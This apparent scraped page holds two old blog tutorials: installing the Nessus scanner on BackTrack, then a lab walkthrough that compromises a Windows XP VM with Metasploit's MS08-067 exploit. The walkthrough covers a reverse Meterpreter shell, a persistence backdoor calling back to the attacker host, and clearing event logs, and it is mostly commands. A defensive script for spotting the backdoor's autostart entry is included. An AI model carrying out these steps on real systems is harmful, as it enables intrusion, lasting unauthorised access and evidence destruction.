Installing Nessus on BackTrack

  • Upload
    thanglx


  • 8/12/2019 Installing Nessus on BackTrack


    Mar 19

    How to Install Nessus on Backtrack 5 R3

    Nessus is a network vulnerability scanning program. It is free for personal use. It can detect vulnerabilities on systems. Nessus is the most popular vulnerability scanner in computer security. Nessus scans for vulnerabilities, misconfigurations, default passwords / common passwords / blank passwords on some system accounts, etc. You can use Nessus to scan your system and patch the vulnerabilities. If you want to install Nessus on Backtrack 5 R3, the first thing to do is download it from http://www.tenable.com/products/nessus/

    Download the Nessus package from http://www.tenable.com/products/nessus/ and install it manually. Read my earlier post, How to Install Package on Backtrack 5; after you install it, skip to step two. If you have an internet connection, you can install Nessus from the repository. Run this command to download and install Nessus:

    apt-get install nessus

    After installing it, create an account with the adduser command like this:

    /opt/nessus/sbin/nessus-adduser

    Now register on the Nessus website http://www.nessus.org/register/ to get your activation code, which is sent to your email. After you get the key, run this command, replacing xxxx-xxxx-xxxx-xxxx-xxxx with your key:

    /opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx

    It will take some time because the plugins are being updated. After the update completes, start Nessus:

    /etc/init.d/nessusd start

    Then open your browser and type this URL:

    https://localhost:8834/

    Nessus runs over the secure channel HTTPS on port 8834. Now try Nessus, and use it at your own risk :-D


    Exploit Windows XP SP3 Using Metasploit (msfconsole)

    Holla Guys,

    Let's do some exploitation. :D

    1. Start up your XP in VirtualBox

    (those who haven't installed XP in VirtualBox can see the tutorial here)

    2. Make sure that the host (BT 5r1) and the XP machine are connected to each other.

    3. Let's scan the target to see the services running:

    # nmap -A 192.168.56.101

    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-01-28 05:25 WIT
    Nmap scan report for 192.168.56.101
    Host is up (0.00043s latency).
    Not shown: 997 closed ports
    PORT    STATE SERVICE      VERSION
    135/tcp open  msrpc        Microsoft Windows RPC
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
    MAC Address: 08:00:27:91:01:D1 (Cadmus Computer Systems)
    Device type: general purpose
    Running: Microsoft Windows XP|2003
    OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
    Network Distance: 1 hop
    Service Info: OS: Windows

    Host script results:
    |_nbstat: NetBIOS name: YUDHI-HOME, NetBIOS user: , NetBIOS MAC: 08:00:27:91:01:d1 (Cadmus Computer Systems)
    |_smbv2-enabled: Server doesn't support SMBv2 protocol
    | smb-os-discovery:
    |   OS: Windows XP (Windows 2000 LAN Manager)
    |   Name: WORKGROUP\YUDHI-HOME
    |_  System time: 2012-01-28 05:25:50 UTC+7

    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.43 ms 192.168.56.101

    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 22.64 seconds

    4. Let's scan for vulnerabilities using Nessus.

    (for how to use Nessus you can go here)

    After the scan finishes, let's analyze the report.

    Great, it says that our target's SMB service is vulnerable, and its vulnerability level is high too.

    Pay attention to this, because we have to use it to search for the right exploit. Or simply look there.

    That plugin name is the hint for finding the right exploit.

    4. Let's search Metasploit for the exploit that attacks that vulnerability. Start your Metasploit console.


    # msfconsole

    To search for the exploit, type:

    msf > search platform:windows type:exploit cve:-2008-4834 app:server path:exploit/windows/smb

    Explanation: for the search syntax, type "search -h".

    platform : because the target is a Windows system, we choose this.

    type : because we only want to search for an exploit, we choose exploit for this.

    cve : fill in with the data from the Nessus scan.

    app : server-side attack.

    path : because we want to search only for SMB exploits, setting the path to this is right.

    Hit Enter.

    Notice the exploit "ms08_067_netapi", located at exploit/windows/smb/ms08_067_netapi. It is the one that has the same name as the plugin name that we discovered with Nessus earlier. It is important to know that almost all Windows systems are vulnerable to this exploit. Let's use it.

    5. Type these:

    use exploit/windows/smb/ms08_067_netapi

    Explanation: by typing this we set Metasploit to use this exploit on the target.

    set RHOST 192.168.56.101

    Explanation: RHOST is the target; set it to the IP of the target that you want to attack.

    set PAYLOAD windows/meterpreter/reverse_tcp


    Explanation: meterpreter is the payload that we want to use. I'll explain more about payloads later.

    set LHOST 192.168.56.1

    Explanation: LHOST is the listener host. This is us; set it to our IP.

    exploit

    Launch the attack.

    6. If everything is done correctly, a meterpreter shell will appear on the target system.

    7. From this point, the server is under our control. But to prevent the user from killing our meterpreter process, we must quickly migrate to one of the other running services.

    To show the running processes on the target system, type:

    meterpreter > ps

    Search for the explorer.exe process, since it is the most important service on Windows, and identify its process number. Let's migrate to that service.

    meterpreter > migrate [PID]

    You can do whatever you want on the system now.

    8. OK, the next step is placing a backdoor for later connections. Luckily for us, Metasploit also provides a script for it called "persistence". Let's see the usage of this script.

    meterpreter > run persistence -h


    Let's execute it.

    meterpreter > run persistence -A -X -p 10000 -r 192.168.56.1

    And that's it. A backdoor has been created on the target system.

    (The backdoor will be located in the C:\WINDOWS\TEMP directory. It is a .vbs file. The script will also create an autostart entry in the registry key HKLM\Software\Microsoft\CurrentVersion\Run\XXXXX(random). So, when the PC starts, the backdoor will also become active. For a tutorial on using the backdoor, you can go here.)

    9. And don't forget to clear our hacking tracks.

    meterpreter > clearev

    To exit the shell, just type "exit".
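
A defender's check for the autostart artifact described in step 8, as an added example that is not part of the original post: it parses `reg query` output for the Run key and flags values that launch a script file from a temp directory. The sample output, value names and paths are constructed, and the key path used is the standard HKLM\Software\Microsoft\Windows\CurrentVersion\Run (an assumption about where the entry lands).

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of:
#   reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
# Every value name and path below is invented for illustration.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VBoxTray    REG_SZ    C:\WINDOWS\system32\VBoxTray.exe
    Updater     REG_SZ    "C:\Program Files\Vendor\update.exe" /background
    qTzxkLbU    REG_SZ    C:\WINDOWS\TEMP\hGfdsaQw.vbs
    LogonNote   REG_SZ    wscript.exe "C:\Documents and Settings\bob\Local Settings\Temp\n.vbs"
"""

VALUE_LINE = re.compile(r"^\s+(?P<name>.+?)\s+REG_[A-Z_]+\s+(?P<data>.*)$")
# A path is either a quoted string or an unquoted token starting with a drive letter.
PATH_TOKEN = re.compile(r'"([^"]+)"|([A-Za-z]:\\\S+)')
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf"}
TEMP_DIRS = {"temp", "tmp"}


def parse_run_values(text):
    """Yield (value name, command line) for each value in `reg query` output."""
    for line in text.splitlines():
        match = VALUE_LINE.match(line)
        if match:
            yield match.group("name"), match.group("data").strip()


def suspicious_run_entries(text):
    """Return (name, path, reasons) for values that start a script from a temp dir."""
    findings = []
    for name, data in parse_run_values(text):
        for quoted, bare in PATH_TOKEN.findall(data):
            path = PureWindowsPath(quoted or bare)
            reasons = []
            if path.suffix.lower() in SCRIPT_EXTS:
                reasons.append("script file")
            if any(part.lower() in TEMP_DIRS for part in path.parts[:-1]):
                reasons.append("temp directory")
            if len(reasons) == 2:  # both indicators, as in the artifact described above
                findings.append((name, str(path), reasons))
    return findings


if __name__ == "__main__":
    for name, path, reasons in suspicious_run_entries(SAMPLE_REG_QUERY):
        print(f"{name}: {path} ({', '.join(reasons)})")
```

Unquoted paths that contain spaces are cut at the first space by this parser, so review such values by hand.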

    Mapped onto the hacking methodology, this attack breaks down as follows:

    1. Information Gathering

    Using nmap to get the information.

    2. Service Enumeration

    Using nmap to see the services running.

    3. Vulnerability Assessment

    Using Nessus to scan for the vulnerability and Metasploit to search for the exploit.

    4. Exploit

    Using Metasploit in console mode to take over the system.

    5. Backdooring

    Using the Metasploit 'persistence' script to create a backdoor.

    6. Housekeeping

    Using Metasploit 'clearev' to clear the tracks.

    Hope this helps. :)

    Let's make history!!


    Read more: http://scx010c075.blogspot.com/2012/01/exploit-windows-xp-sp3-using-metasploit.html#ixzz2wbooxOrw